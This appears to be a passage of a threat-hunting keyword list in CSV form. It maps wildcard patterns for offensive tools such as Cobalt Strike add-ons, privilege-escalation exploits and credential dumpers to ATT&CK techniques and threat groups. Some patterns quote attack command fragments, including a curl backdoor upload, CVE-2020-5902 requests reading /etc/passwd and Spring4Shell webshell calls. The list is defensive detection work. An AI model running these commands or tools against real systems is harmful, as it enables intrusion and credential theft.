+"*CS-Avoid-killing*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z"
+"*CS-BOFs/lsass*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
+"*csc.exe /t:exe /out:RandomName.exe Program.cs*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z"
+"*csc.exe EfsPotato.cs *","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","613","114","2023-06-01T15:03:53Z","2021-07-26T21:36:16Z"
+"*cscript *wmi.vbs -h*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cscript ..\\temp.vbs*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z"
+"*cscript dl.vbs *http*/*.zip*.zip*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z"
+"*CsEnox/SeManageVolumeExploit*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z"
+"*csexec/csexec_history*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"*csharp_inject_bof_inject*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*CSharpNamedPipeLoader*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z"
+"*csload.net/*/muma.*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z"
+"*csOnvps*teamserver*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*cSploit-*.apk*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3110","1131","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z" +"*cSploit/android*","offensive_tool_keyword","csploit","The most complete and advanced IT security professional toolkit on Android.","T1555 - T1569 - T1210","TA0002 - TA0003 - 
TA0009","N/A","N/A","Frameworks","https://github.com/cSploit/android","1","1","N/A","N/A","10","3110","1131","2022-09-02T00:16:04Z","2014-10-04T05:53:29Z" +"*csprecon -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*CS-Remote-OPs-BOF*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*csrf_to_beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*CSSG_load.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*cs-token-vault.git*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*CT_Indirect_Syscalls.c*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.exe*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. 
This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.sln*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*CT_Indirect_Syscalls.vcxproj*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*ctfr.py*","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1793","281","2022-05-03T12:59:37Z","2018-03-06T01:14:28Z" +"*ctftool*","offensive_tool_keyword","ctftool","This is ctftool. an interactive command line tool to experiment with CTF. 
a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. debugging complex issues with Text Input Processors and analyzing Windows security.","T1547.001 - T1059 - T1057","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/taviso/ctftool","1","0","N/A","N/A","10","1626","278","2021-09-17T21:02:25Z","2019-06-07T03:39:10Z" +"*cube0x0/LdapSignCheck*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*cube0x0/MiniDump*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - 
T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" +"*cuddlephish*stealer.js","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*cuddlephish-main*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*curi0usJack*","offensive_tool_keyword","Github Username","github user hosting malicious code and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/curi0usJack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*curl * --upload-file backdoor.php -v*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*curl --connect-timeout 3.14 -s ifconfig.me*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data 
Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","0","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" +"*curl http*/handling-form-submission-complete/rce.jsp*","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","303","229","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" +"*curl https://api.hunter.io/v2/domain-search?domain=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*curl https://api.hunter.io/v2/email-finder?domain=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*curl https://api.hunter.io/v2/email-verifier?email=*","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. 
Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://hunter.io/","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*curl --output *http*/tomcatwar.jsp?*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" +"*curl -sk 'https://*/tmui/login.jsp/.. /tmui/util/getTabSet.jsp?tabId=Vulnerable*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*curl*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*curl*/tmp/exploit-dirty-pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" +"*curlshell.py*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*cursed chrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*cursed cookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*custom_payload_generator.*","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've 
